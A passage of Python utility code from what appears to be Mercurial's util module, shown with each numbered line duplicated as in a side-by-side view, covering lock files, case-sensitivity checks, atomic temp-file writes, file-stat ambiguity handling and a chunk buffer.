2081 """Create a lock file atomically if possible
2081 """Create a lock file atomically if possible
2082
2082
2083 This may leave a stale lock file if symlink isn't supported and signal
2083 This may leave a stale lock file if symlink isn't supported and signal
2084 interrupt is enabled.
2084 interrupt is enabled.
2085 """
2085 """
2086 try:
2086 try:
2087 return os.symlink(info, pathname)
2087 return os.symlink(info, pathname)
2088 except OSError as why:
2088 except OSError as why:
2089 if why.errno == errno.EEXIST:
2089 if why.errno == errno.EEXIST:
2090 raise
2090 raise
2091 except AttributeError: # no symlink in os
2091 except AttributeError: # no symlink in os
2092 pass
2092 pass
2093
2093
2094 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
2094 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
2095 ld = os.open(pathname, flags)
2095 ld = os.open(pathname, flags)
2096 os.write(ld, info)
2096 os.write(ld, info)
2097 os.close(ld)
2097 os.close(ld)
2098
2098
2099
2099
2100 def readlock(pathname):
2100 def readlock(pathname):
2101 try:
2101 try:
2102 return readlink(pathname)
2102 return readlink(pathname)
2103 except OSError as why:
2103 except OSError as why:
2104 if why.errno not in (errno.EINVAL, errno.ENOSYS):
2104 if why.errno not in (errno.EINVAL, errno.ENOSYS):
2105 raise
2105 raise
2106 except AttributeError: # no symlink in os
2106 except AttributeError: # no symlink in os
2107 pass
2107 pass
2108 with posixfile(pathname, b'rb') as fp:
2108 with posixfile(pathname, b'rb') as fp:
2109 return fp.read()
2109 return fp.read()
2110
2110
2111
2111
2112 def fstat(fp):
2112 def fstat(fp):
2113 '''stat file object that may not have fileno method.'''
2113 '''stat file object that may not have fileno method.'''
2114 try:
2114 try:
2115 return os.fstat(fp.fileno())
2115 return os.fstat(fp.fileno())
2116 except AttributeError:
2116 except AttributeError:
2117 return os.stat(fp.name)
2117 return os.stat(fp.name)
2118
2118
2119
2119
2120 # File system features
2120 # File system features
2121
2121
2122
2122
2123 def fscasesensitive(path):
2123 def fscasesensitive(path):
2124 """
2124 """
2125 Return true if the given path is on a case-sensitive filesystem
2125 Return true if the given path is on a case-sensitive filesystem
2126
2126
2127 Requires a path (like /foo/.hg) ending with a foldable final
2127 Requires a path (like /foo/.hg) ending with a foldable final
2128 directory component.
2128 directory component.
2129 """
2129 """
2130 s1 = os.lstat(path)
2130 s1 = os.lstat(path)
2131 d, b = os.path.split(path)
2131 d, b = os.path.split(path)
2132 b2 = b.upper()
2132 b2 = b.upper()
2133 if b == b2:
2133 if b == b2:
2134 b2 = b.lower()
2134 b2 = b.lower()
2135 if b == b2:
2135 if b == b2:
2136 return True # no evidence against case sensitivity
2136 return True # no evidence against case sensitivity
2137 p2 = os.path.join(d, b2)
2137 p2 = os.path.join(d, b2)
2138 try:
2138 try:
2139 s2 = os.lstat(p2)
2139 s2 = os.lstat(p2)
2140 if s2 == s1:
2140 if s2 == s1:
2141 return False
2141 return False
2142 return True
2142 return True
2143 except OSError:
2143 except OSError:
2144 return True
2144 return True
2145
2145
2146
2146
2147 try:
2147 try:
2148 import re2 # pytype: disable=import-error
2148 import re2 # pytype: disable=import-error
2149
2149
2150 _re2 = None
2150 _re2 = None
2151 except ImportError:
2151 except ImportError:
2152 _re2 = False
2152 _re2 = False
2153
2153
2154
2154
2155 class _re(object):
2155 class _re(object):
2156 def _checkre2(self):
2156 def _checkre2(self):
2157 global _re2
2157 global _re2
2158 try:
2158 try:
2159 # check if match works, see issue3964
2159 # check if match works, see issue3964
2160 _re2 = bool(re2.match(r'\[([^\[]+)\]', b'[ui]'))
2160 _re2 = bool(re2.match(r'\[([^\[]+)\]', b'[ui]'))
2161 except ImportError:
2161 except ImportError:
2162 _re2 = False
2162 _re2 = False
2163
2163
2164 def compile(self, pat, flags=0):
2164 def compile(self, pat, flags=0):
2165 '''Compile a regular expression, using re2 if possible
2165 '''Compile a regular expression, using re2 if possible
2166
2166
2167 For best performance, use only re2-compatible regexp features. The
2167 For best performance, use only re2-compatible regexp features. The
2168 only flags from the re module that are re2-compatible are
2168 only flags from the re module that are re2-compatible are
2169 IGNORECASE and MULTILINE.'''
2169 IGNORECASE and MULTILINE.'''
2170 if _re2 is None:
2170 if _re2 is None:
2171 self._checkre2()
2171 self._checkre2()
2172 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
2172 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
2173 if flags & remod.IGNORECASE:
2173 if flags & remod.IGNORECASE:
2174 pat = b'(?i)' + pat
2174 pat = b'(?i)' + pat
2175 if flags & remod.MULTILINE:
2175 if flags & remod.MULTILINE:
2176 pat = b'(?m)' + pat
2176 pat = b'(?m)' + pat
2177 try:
2177 try:
2178 return re2.compile(pat)
2178 return re2.compile(pat)
2179 except re2.error:
2179 except re2.error:
2180 pass
2180 pass
2181 return remod.compile(pat, flags)
2181 return remod.compile(pat, flags)
2182
2182
2183 @propertycache
2183 @propertycache
2184 def escape(self):
2184 def escape(self):
2185 '''Return the version of escape corresponding to self.compile.
2185 '''Return the version of escape corresponding to self.compile.
2186
2186
2187 This is imperfect because whether re2 or re is used for a particular
2187 This is imperfect because whether re2 or re is used for a particular
2188 function depends on the flags, etc, but it's the best we can do.
2188 function depends on the flags, etc, but it's the best we can do.
2189 '''
2189 '''
2190 global _re2
2190 global _re2
2191 if _re2 is None:
2191 if _re2 is None:
2192 self._checkre2()
2192 self._checkre2()
2193 if _re2:
2193 if _re2:
2194 return re2.escape
2194 return re2.escape
2195 else:
2195 else:
2196 return remod.escape
2196 return remod.escape
2197
2197
2198
2198
2199 re = _re()
2199 re = _re()
2200
2200
2201 _fspathcache = {}
2201 _fspathcache = {}
2202
2202
2203
2203
2204 def fspath(name, root):
2204 def fspath(name, root):
2205 '''Get name in the case stored in the filesystem
2205 '''Get name in the case stored in the filesystem
2206
2206
2207 The name should be relative to root, and be normcase-ed for efficiency.
2207 The name should be relative to root, and be normcase-ed for efficiency.
2208
2208
2209 Note that this function is unnecessary, and should not be
2209 Note that this function is unnecessary, and should not be
2210 called, for case-sensitive filesystems (simply because it's expensive).
2210 called, for case-sensitive filesystems (simply because it's expensive).
2211
2211
2212 The root should be normcase-ed, too.
2212 The root should be normcase-ed, too.
2213 '''
2213 '''
2214
2214
2215 def _makefspathcacheentry(dir):
2215 def _makefspathcacheentry(dir):
2216 return dict((normcase(n), n) for n in os.listdir(dir))
2216 return dict((normcase(n), n) for n in os.listdir(dir))
2217
2217
2218 seps = pycompat.ossep
2218 seps = pycompat.ossep
2219 if pycompat.osaltsep:
2219 if pycompat.osaltsep:
2220 seps = seps + pycompat.osaltsep
2220 seps = seps + pycompat.osaltsep
2221 # Protect backslashes. This gets silly very quickly.
2221 # Protect backslashes. This gets silly very quickly.
2222 seps.replace(b'\\', b'\\\\')
2222 seps.replace(b'\\', b'\\\\')
2223 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
2223 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
2224 dir = os.path.normpath(root)
2224 dir = os.path.normpath(root)
2225 result = []
2225 result = []
2226 for part, sep in pattern.findall(name):
2226 for part, sep in pattern.findall(name):
2227 if sep:
2227 if sep:
2228 result.append(sep)
2228 result.append(sep)
2229 continue
2229 continue
2230
2230
2231 if dir not in _fspathcache:
2231 if dir not in _fspathcache:
2232 _fspathcache[dir] = _makefspathcacheentry(dir)
2232 _fspathcache[dir] = _makefspathcacheentry(dir)
2233 contents = _fspathcache[dir]
2233 contents = _fspathcache[dir]
2234
2234
2235 found = contents.get(part)
2235 found = contents.get(part)
2236 if not found:
2236 if not found:
2237 # retry "once per directory" per "dirstate.walk" which
2237 # retry "once per directory" per "dirstate.walk" which
2238 # may take place for each patches of "hg qpush", for example
2238 # may take place for each patches of "hg qpush", for example
2239 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
2239 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
2240 found = contents.get(part)
2240 found = contents.get(part)
2241
2241
2242 result.append(found or part)
2242 result.append(found or part)
2243 dir = os.path.join(dir, part)
2243 dir = os.path.join(dir, part)
2244
2244
2245 return b''.join(result)
2245 return b''.join(result)
2246
2246
2247
2247
2248 def checknlink(testfile):
2248 def checknlink(testfile):
2249 '''check whether hardlink count reporting works properly'''
2249 '''check whether hardlink count reporting works properly'''
2250
2250
2251 # testfile may be open, so we need a separate file for checking to
2251 # testfile may be open, so we need a separate file for checking to
2252 # work around issue2543 (or testfile may get lost on Samba shares)
2252 # work around issue2543 (or testfile may get lost on Samba shares)
2253 f1, f2, fp = None, None, None
2253 f1, f2, fp = None, None, None
2254 try:
2254 try:
2255 fd, f1 = pycompat.mkstemp(
2255 fd, f1 = pycompat.mkstemp(
2256 prefix=b'.%s-' % os.path.basename(testfile),
2256 prefix=b'.%s-' % os.path.basename(testfile),
2257 suffix=b'1~',
2257 suffix=b'1~',
2258 dir=os.path.dirname(testfile),
2258 dir=os.path.dirname(testfile),
2259 )
2259 )
2260 os.close(fd)
2260 os.close(fd)
2261 f2 = b'%s2~' % f1[:-2]
2261 f2 = b'%s2~' % f1[:-2]
2262
2262
2263 oslink(f1, f2)
2263 oslink(f1, f2)
2264 # nlinks() may behave differently for files on Windows shares if
2264 # nlinks() may behave differently for files on Windows shares if
2265 # the file is open.
2265 # the file is open.
2266 fp = posixfile(f2)
2266 fp = posixfile(f2)
2267 return nlinks(f2) > 1
2267 return nlinks(f2) > 1
2268 except OSError:
2268 except OSError:
2269 return False
2269 return False
2270 finally:
2270 finally:
2271 if fp is not None:
2271 if fp is not None:
2272 fp.close()
2272 fp.close()
2273 for f in (f1, f2):
2273 for f in (f1, f2):
2274 try:
2274 try:
2275 if f is not None:
2275 if f is not None:
2276 os.unlink(f)
2276 os.unlink(f)
2277 except OSError:
2277 except OSError:
2278 pass
2278 pass
2279
2279
2280
2280
2281 def endswithsep(path):
2281 def endswithsep(path):
2282 '''Check path ends with os.sep or os.altsep.'''
2282 '''Check path ends with os.sep or os.altsep.'''
2283 return (
2283 return (
2284 path.endswith(pycompat.ossep)
2284 path.endswith(pycompat.ossep)
2285 or pycompat.osaltsep
2285 or pycompat.osaltsep
2286 and path.endswith(pycompat.osaltsep)
2286 and path.endswith(pycompat.osaltsep)
2287 )
2287 )
2288
2288
2289
2289
2290 def splitpath(path):
2290 def splitpath(path):
2291 '''Split path by os.sep.
2291 '''Split path by os.sep.
2292 Note that this function does not use os.altsep because this is
2292 Note that this function does not use os.altsep because this is
2293 an alternative of simple "xxx.split(os.sep)".
2293 an alternative of simple "xxx.split(os.sep)".
2294 It is recommended to use os.path.normpath() before using this
2294 It is recommended to use os.path.normpath() before using this
2295 function if need.'''
2295 function if need.'''
2296 return path.split(pycompat.ossep)
2296 return path.split(pycompat.ossep)
2297
2297
2298
2298
2299 def mktempcopy(name, emptyok=False, createmode=None, enforcewritable=False):
2299 def mktempcopy(name, emptyok=False, createmode=None, enforcewritable=False):
2300 """Create a temporary file with the same contents from name
2300 """Create a temporary file with the same contents from name
2301
2301
2302 The permission bits are copied from the original file.
2302 The permission bits are copied from the original file.
2303
2303
2304 If the temporary file is going to be truncated immediately, you
2304 If the temporary file is going to be truncated immediately, you
2305 can use emptyok=True as an optimization.
2305 can use emptyok=True as an optimization.
2306
2306
2307 Returns the name of the temporary file.
2307 Returns the name of the temporary file.
2308 """
2308 """
2309 d, fn = os.path.split(name)
2309 d, fn = os.path.split(name)
2310 fd, temp = pycompat.mkstemp(prefix=b'.%s-' % fn, suffix=b'~', dir=d)
2310 fd, temp = pycompat.mkstemp(prefix=b'.%s-' % fn, suffix=b'~', dir=d)
2311 os.close(fd)
2311 os.close(fd)
2312 # Temporary files are created with mode 0600, which is usually not
2312 # Temporary files are created with mode 0600, which is usually not
2313 # what we want. If the original file already exists, just copy
2313 # what we want. If the original file already exists, just copy
2314 # its mode. Otherwise, manually obey umask.
2314 # its mode. Otherwise, manually obey umask.
2315 copymode(name, temp, createmode, enforcewritable)
2315 copymode(name, temp, createmode, enforcewritable)
2316
2316
2317 if emptyok:
2317 if emptyok:
2318 return temp
2318 return temp
2319 try:
2319 try:
2320 try:
2320 try:
2321 ifp = posixfile(name, b"rb")
2321 ifp = posixfile(name, b"rb")
2322 except IOError as inst:
2322 except IOError as inst:
2323 if inst.errno == errno.ENOENT:
2323 if inst.errno == errno.ENOENT:
2324 return temp
2324 return temp
2325 if not getattr(inst, 'filename', None):
2325 if not getattr(inst, 'filename', None):
2326 inst.filename = name
2326 inst.filename = name
2327 raise
2327 raise
2328 ofp = posixfile(temp, b"wb")
2328 ofp = posixfile(temp, b"wb")
2329 for chunk in filechunkiter(ifp):
2329 for chunk in filechunkiter(ifp):
2330 ofp.write(chunk)
2330 ofp.write(chunk)
2331 ifp.close()
2331 ifp.close()
2332 ofp.close()
2332 ofp.close()
2333 except: # re-raises
2333 except: # re-raises
2334 try:
2334 try:
2335 os.unlink(temp)
2335 os.unlink(temp)
2336 except OSError:
2336 except OSError:
2337 pass
2337 pass
2338 raise
2338 raise
2339 return temp
2339 return temp
2340
2340
2341
2341
2342 class filestat(object):
2342 class filestat(object):
2343 """help to exactly detect change of a file
2343 """help to exactly detect change of a file
2344
2344
2345 'stat' attribute is result of 'os.stat()' if specified 'path'
2345 'stat' attribute is result of 'os.stat()' if specified 'path'
2346 exists. Otherwise, it is None. This can avoid preparative
2346 exists. Otherwise, it is None. This can avoid preparative
2347 'exists()' examination on client side of this class.
2347 'exists()' examination on client side of this class.
2348 """
2348 """
2349
2349
2350 def __init__(self, stat):
2350 def __init__(self, stat):
2351 self.stat = stat
2351 self.stat = stat
2352
2352
2353 @classmethod
2353 @classmethod
2354 def frompath(cls, path):
2354 def frompath(cls, path):
2355 try:
2355 try:
2356 stat = os.stat(path)
2356 stat = os.stat(path)
2357 except OSError as err:
2357 except OSError as err:
2358 if err.errno != errno.ENOENT:
2358 if err.errno != errno.ENOENT:
2359 raise
2359 raise
2360 stat = None
2360 stat = None
2361 return cls(stat)
2361 return cls(stat)
2362
2362
2363 @classmethod
2363 @classmethod
2364 def fromfp(cls, fp):
2364 def fromfp(cls, fp):
2365 stat = os.fstat(fp.fileno())
2365 stat = os.fstat(fp.fileno())
2366 return cls(stat)
2366 return cls(stat)
2367
2367
2368 __hash__ = object.__hash__
2368 __hash__ = object.__hash__
2369
2369
2370 def __eq__(self, old):
2370 def __eq__(self, old):
2371 try:
2371 try:
2372 # if ambiguity between stat of new and old file is
2372 # if ambiguity between stat of new and old file is
2373 # avoided, comparison of size, ctime and mtime is enough
2373 # avoided, comparison of size, ctime and mtime is enough
2374 # to exactly detect change of a file regardless of platform
2374 # to exactly detect change of a file regardless of platform
2375 return (
2375 return (
2376 self.stat.st_size == old.stat.st_size
2376 self.stat.st_size == old.stat.st_size
2377 and self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
2377 and self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
2378 and self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME]
2378 and self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME]
2379 )
2379 )
2380 except AttributeError:
2380 except AttributeError:
2381 pass
2381 pass
2382 try:
2382 try:
2383 return self.stat is None and old.stat is None
2383 return self.stat is None and old.stat is None
2384 except AttributeError:
2384 except AttributeError:
2385 return False
2385 return False
2386
2386
2387 def isambig(self, old):
2387 def isambig(self, old):
2388 """Examine whether new (= self) stat is ambiguous against old one
2388 """Examine whether new (= self) stat is ambiguous against old one
2389
2389
2390 "S[N]" below means stat of a file at N-th change:
2390 "S[N]" below means stat of a file at N-th change:
2391
2391
2392 - S[n-1].ctime < S[n].ctime: can detect change of a file
2392 - S[n-1].ctime < S[n].ctime: can detect change of a file
2393 - S[n-1].ctime == S[n].ctime
2393 - S[n-1].ctime == S[n].ctime
2394 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2394 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2395 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2395 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2396 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2396 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2397 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2397 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2398
2398
2399 Case (*2) above means that a file was changed twice or more at
2399 Case (*2) above means that a file was changed twice or more at
2400 same time in sec (= S[n-1].ctime), and comparison of timestamp
2400 same time in sec (= S[n-1].ctime), and comparison of timestamp
2401 is ambiguous.
2401 is ambiguous.
2402
2402
2403 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2403 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2404 timestamp is ambiguous".
2404 timestamp is ambiguous".
2405
2405
2406 But advancing mtime only in case (*2) doesn't work as
2406 But advancing mtime only in case (*2) doesn't work as
2407 expected, because naturally advanced S[n].mtime in case (*1)
2407 expected, because naturally advanced S[n].mtime in case (*1)
2408 might be equal to manually advanced S[n-1 or earlier].mtime.
2408 might be equal to manually advanced S[n-1 or earlier].mtime.
2409
2409
2410 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2410 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2411 treated as ambiguous regardless of mtime, to avoid overlooking
2411 treated as ambiguous regardless of mtime, to avoid overlooking
2412 by confliction between such mtime.
2412 by confliction between such mtime.
2413
2413
2414 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2414 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2415 S[n].mtime", even if size of a file isn't changed.
2415 S[n].mtime", even if size of a file isn't changed.
2416 """
2416 """
2417 try:
2417 try:
2418 return self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
2418 return self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
2419 except AttributeError:
2419 except AttributeError:
2420 return False
2420 return False
2421
2421
2422 def avoidambig(self, path, old):
2422 def avoidambig(self, path, old):
2423 """Change file stat of specified path to avoid ambiguity
2423 """Change file stat of specified path to avoid ambiguity
2424
2424
2425 'old' should be previous filestat of 'path'.
2425 'old' should be previous filestat of 'path'.
2426
2426
2427 This skips avoiding ambiguity, if a process doesn't have
2427 This skips avoiding ambiguity, if a process doesn't have
2428 appropriate privileges for 'path'. This returns False in this
2428 appropriate privileges for 'path'. This returns False in this
2429 case.
2429 case.
2430
2430
2431 Otherwise, this returns True, as "ambiguity is avoided".
2431 Otherwise, this returns True, as "ambiguity is avoided".
2432 """
2432 """
2433 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
2433 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
2434 try:
2434 try:
2435 os.utime(path, (advanced, advanced))
2435 os.utime(path, (advanced, advanced))
2436 except OSError as inst:
2436 except OSError as inst:
2437 if inst.errno == errno.EPERM:
2437 if inst.errno == errno.EPERM:
2438 # utime() on the file created by another user causes EPERM,
2438 # utime() on the file created by another user causes EPERM,
2439 # if a process doesn't have appropriate privileges
2439 # if a process doesn't have appropriate privileges
2440 return False
2440 return False
2441 raise
2441 raise
2442 return True
2442 return True
2443
2443
2444 def __ne__(self, other):
2444 def __ne__(self, other):
2445 return not self == other
2445 return not self == other
2446
2446
2447
2447
2448 class atomictempfile(object):
2448 class atomictempfile(object):
2449 '''writable file object that atomically updates a file
2449 '''writable file object that atomically updates a file
2450
2450
2451 All writes will go to a temporary copy of the original file. Call
2451 All writes will go to a temporary copy of the original file. Call
2452 close() when you are done writing, and atomictempfile will rename
2452 close() when you are done writing, and atomictempfile will rename
2453 the temporary copy to the original name, making the changes
2453 the temporary copy to the original name, making the changes
2454 visible. If the object is destroyed without being closed, all your
2454 visible. If the object is destroyed without being closed, all your
2455 writes are discarded.
2455 writes are discarded.
2456
2456
2457 checkambig argument of constructor is used with filestat, and is
2457 checkambig argument of constructor is used with filestat, and is
2458 useful only if target file is guarded by any lock (e.g. repo.lock
2458 useful only if target file is guarded by any lock (e.g. repo.lock
2459 or repo.wlock).
2459 or repo.wlock).
2460 '''
2460 '''
2461
2461
2462 def __init__(self, name, mode=b'w+b', createmode=None, checkambig=False):
2462 def __init__(self, name, mode=b'w+b', createmode=None, checkambig=False):
2463 self.__name = name # permanent name
2463 self.__name = name # permanent name
2464 self._tempname = mktempcopy(
2464 self._tempname = mktempcopy(
2465 name,
2465 name,
2466 emptyok=(b'w' in mode),
2466 emptyok=(b'w' in mode),
2467 createmode=createmode,
2467 createmode=createmode,
2468 enforcewritable=(b'w' in mode),
2468 enforcewritable=(b'w' in mode),
2469 )
2469 )
2470
2470
2471 self._fp = posixfile(self._tempname, mode)
2471 self._fp = posixfile(self._tempname, mode)
2472 self._checkambig = checkambig
2472 self._checkambig = checkambig
2473
2473
2474 # delegated methods
2474 # delegated methods
2475 self.read = self._fp.read
2475 self.read = self._fp.read
2476 self.write = self._fp.write
2476 self.write = self._fp.write
2477 self.seek = self._fp.seek
2477 self.seek = self._fp.seek
2478 self.tell = self._fp.tell
2478 self.tell = self._fp.tell
2479 self.fileno = self._fp.fileno
2479 self.fileno = self._fp.fileno
2480
2480
2481 def close(self):
2481 def close(self):
2482 if not self._fp.closed:
2482 if not self._fp.closed:
2483 self._fp.close()
2483 self._fp.close()
2484 filename = localpath(self.__name)
2484 filename = localpath(self.__name)
2485 oldstat = self._checkambig and filestat.frompath(filename)
2485 oldstat = self._checkambig and filestat.frompath(filename)
2486 if oldstat and oldstat.stat:
2486 if oldstat and oldstat.stat:
2487 rename(self._tempname, filename)
2487 rename(self._tempname, filename)
2488 newstat = filestat.frompath(filename)
2488 newstat = filestat.frompath(filename)
2489 if newstat.isambig(oldstat):
2489 if newstat.isambig(oldstat):
2490 # stat of changed file is ambiguous to original one
2490 # stat of changed file is ambiguous to original one
2491 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
2491 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
2492 os.utime(filename, (advanced, advanced))
2492 os.utime(filename, (advanced, advanced))
2493 else:
2493 else:
2494 rename(self._tempname, filename)
2494 rename(self._tempname, filename)
2495
2495
2496 def discard(self):
2496 def discard(self):
2497 if not self._fp.closed:
2497 if not self._fp.closed:
2498 try:
2498 try:
2499 os.unlink(self._tempname)
2499 os.unlink(self._tempname)
2500 except OSError:
2500 except OSError:
2501 pass
2501 pass
2502 self._fp.close()
2502 self._fp.close()
2503
2503
2504 def __del__(self):
2504 def __del__(self):
2505 if safehasattr(self, '_fp'): # constructor actually did something
2505 if safehasattr(self, '_fp'): # constructor actually did something
2506 self.discard()
2506 self.discard()
2507
2507
2508 def __enter__(self):
2508 def __enter__(self):
2509 return self
2509 return self
2510
2510
2511 def __exit__(self, exctype, excvalue, traceback):
2511 def __exit__(self, exctype, excvalue, traceback):
2512 if exctype is not None:
2512 if exctype is not None:
2513 self.discard()
2513 self.discard()
2514 else:
2514 else:
2515 self.close()
2515 self.close()
2516
2516
2517
2517
2518 def unlinkpath(f, ignoremissing=False, rmdir=True):
2518 def unlinkpath(f, ignoremissing=False, rmdir=True):
2519 """unlink and remove the directory if it is empty"""
2519 """unlink and remove the directory if it is empty"""
2520 if ignoremissing:
2520 if ignoremissing:
2521 tryunlink(f)
2521 tryunlink(f)
2522 else:
2522 else:
2523 unlink(f)
2523 unlink(f)
2524 if rmdir:
2524 if rmdir:
2525 # try removing directories that might now be empty
2525 # try removing directories that might now be empty
2526 try:
2526 try:
2527 removedirs(os.path.dirname(f))
2527 removedirs(os.path.dirname(f))
2528 except OSError:
2528 except OSError:
2529 pass
2529 pass
2530
2530
2531
2531
2532 def tryunlink(f):
2532 def tryunlink(f):
2533 """Attempt to remove a file, ignoring ENOENT errors."""
2533 """Attempt to remove a file, ignoring ENOENT errors."""
2534 try:
2534 try:
2535 unlink(f)
2535 unlink(f)
2536 except OSError as e:
2536 except OSError as e:
2537 if e.errno != errno.ENOENT:
2537 if e.errno != errno.ENOENT:
2538 raise
2538 raise
2539
2539
2540
2540
2541 def makedirs(name, mode=None, notindexed=False):
2541 def makedirs(name, mode=None, notindexed=False):
2542 """recursive directory creation with parent mode inheritance
2542 """recursive directory creation with parent mode inheritance
2543
2543
2544 Newly created directories are marked as "not to be indexed by
2544 Newly created directories are marked as "not to be indexed by
2545 the content indexing service", if ``notindexed`` is specified
2545 the content indexing service", if ``notindexed`` is specified
2546 for "write" mode access.
2546 for "write" mode access.
2547 """
2547 """
2548 try:
2548 try:
2549 makedir(name, notindexed)
2549 makedir(name, notindexed)
2550 except OSError as err:
2550 except OSError as err:
2551 if err.errno == errno.EEXIST:
2551 if err.errno == errno.EEXIST:
2552 return
2552 return
2553 if err.errno != errno.ENOENT or not name:
2553 if err.errno != errno.ENOENT or not name:
2554 raise
2554 raise
2555 parent = os.path.dirname(os.path.abspath(name))
2555 parent = os.path.dirname(os.path.abspath(name))
2556 if parent == name:
2556 if parent == name:
2557 raise
2557 raise
2558 makedirs(parent, mode, notindexed)
2558 makedirs(parent, mode, notindexed)
2559 try:
2559 try:
2560 makedir(name, notindexed)
2560 makedir(name, notindexed)
2561 except OSError as err:
2561 except OSError as err:
2562 # Catch EEXIST to handle races
2562 # Catch EEXIST to handle races
2563 if err.errno == errno.EEXIST:
2563 if err.errno == errno.EEXIST:
2564 return
2564 return
2565 raise
2565 raise
2566 if mode is not None:
2566 if mode is not None:
2567 os.chmod(name, mode)
2567 os.chmod(name, mode)
2568
2568
2569
2569
2570 def readfile(path):
2570 def readfile(path):
2571 with open(path, b'rb') as fp:
2571 with open(path, b'rb') as fp:
2572 return fp.read()
2572 return fp.read()
2573
2573
2574
2574
2575 def writefile(path, text):
2575 def writefile(path, text):
2576 with open(path, b'wb') as fp:
2576 with open(path, b'wb') as fp:
2577 fp.write(text)
2577 fp.write(text)
2578
2578
2579
2579
2580 def appendfile(path, text):
2580 def appendfile(path, text):
2581 with open(path, b'ab') as fp:
2581 with open(path, b'ab') as fp:
2582 fp.write(text)
2582 fp.write(text)
2583
2583
2584
2584
2585 class chunkbuffer(object):
2585 class chunkbuffer(object):
2586 """Allow arbitrary sized chunks of data to be efficiently read from an
2586 """Allow arbitrary sized chunks of data to be efficiently read from an
2587 iterator over chunks of arbitrary size."""
2587 iterator over chunks of arbitrary size."""
2588
2588
2589 def __init__(self, in_iter):
2589 def __init__(self, in_iter):
2590 """in_iter is the iterator that's iterating over the input chunks."""
2590 """in_iter is the iterator that's iterating over the input chunks."""
2591
2591
2592 def splitbig(chunks):
2592 def splitbig(chunks):
2593 for chunk in chunks:
2593 for chunk in chunks:
2594 if len(chunk) > 2 ** 20:
2594 if len(chunk) > 2 ** 20:
2595 pos = 0
2595 pos = 0
2596 while pos < len(chunk):
2596 while pos < len(chunk):
2597 end = pos + 2 ** 18
2597 end = pos + 2 ** 18
2598 yield chunk[pos:end]
2598 yield chunk[pos:end]
2599 pos = end
2599 pos = end
2600 else:
2600 else:
2601 yield chunk
2601 yield chunk
2602
2602
2603 self.iter = splitbig(in_iter)
2603 self.iter = splitbig(in_iter)
2604 self._queue = collections.deque()
2604 self._queue = collections.deque()
2605 self._chunkoffset = 0
2605 self._chunkoffset = 0
2606
2606
2607 def read(self, l=None):
2607 def read(self, l=None):
2608 """Read L bytes of data from the iterator of chunks of data.
2608 """Read L bytes of data from the iterator of chunks of data.
2609 Returns less than L bytes if the iterator runs dry.
2609 Returns less than L bytes if the iterator runs dry.
2610
2610
2611 If size parameter is omitted, read everything"""
2611 If size parameter is omitted, read everything"""
2612 if l is None:
2612 if l is None:
2613 return b''.join(self.iter)
2613 return b''.join(self.iter)
2614
2614
2615 left = l
2615 left = l
2616 buf = []
2616 buf = []
2617 queue = self._queue
2617 queue = self._queue
2618 while left > 0:
2618 while left > 0:
2619 # refill the queue
2619 # refill the queue
2620 if not queue:
2620 if not queue:
2621 target = 2 ** 18
2621 target = 2 ** 18
2622 for chunk in self.iter:
2622 for chunk in self.iter:
2623 queue.append(chunk)
2623 queue.append(chunk)
2624 target -= len(chunk)
2624 target -= len(chunk)
2625 if target <= 0:
2625 if target <= 0:
2626 break
2626 break
2627 if not queue:
2627 if not queue:
2628 break
2628 break
2629
2629
2630 # The easy way to do this would be to queue.popleft(), modify the
2630 # The easy way to do this would be to queue.popleft(), modify the
2631 # chunk (if necessary), then queue.appendleft(). However, for cases
2631 # chunk (if necessary), then queue.appendleft(). However, for cases
2632 # where we read partial chunk content, this incurs 2 dequeue
2632 # where we read partial chunk content, this incurs 2 dequeue
2633 # mutations and creates a new str for the remaining chunk in the
2633 # mutations and creates a new str for the remaining chunk in the
2634 # queue. Our code below avoids this overhead.
2634 # queue. Our code below avoids this overhead.
2635
2635
2636 chunk = queue[0]
2636 chunk = queue[0]
2637 chunkl = len(chunk)
2637 chunkl = len(chunk)
2638 offset = self._chunkoffset
2638 offset = self._chunkoffset
2639
2639
2640 # Use full chunk.
2640 # Use full chunk.
2641 if offset == 0 and left >= chunkl:
2641 if offset == 0 and left >= chunkl:
2642 left -= chunkl
2642 left -= chunkl
2643 queue.popleft()
2643 queue.popleft()
2644 buf.append(chunk)
2644 buf.append(chunk)
2645 # self._chunkoffset remains at 0.
2645 # self._chunkoffset remains at 0.
2646 continue
2646 continue
2647
2647
2648 chunkremaining = chunkl - offset
2648 chunkremaining = chunkl - offset
2649
2649
2650 # Use all of unconsumed part of chunk.
2650 # Use all of unconsumed part of chunk.
2651 if left >= chunkremaining:
2651 if left >= chunkremaining:
2652 left -= chunkremaining
2652 left -= chunkremaining
2653 queue.popleft()
2653 queue.popleft()
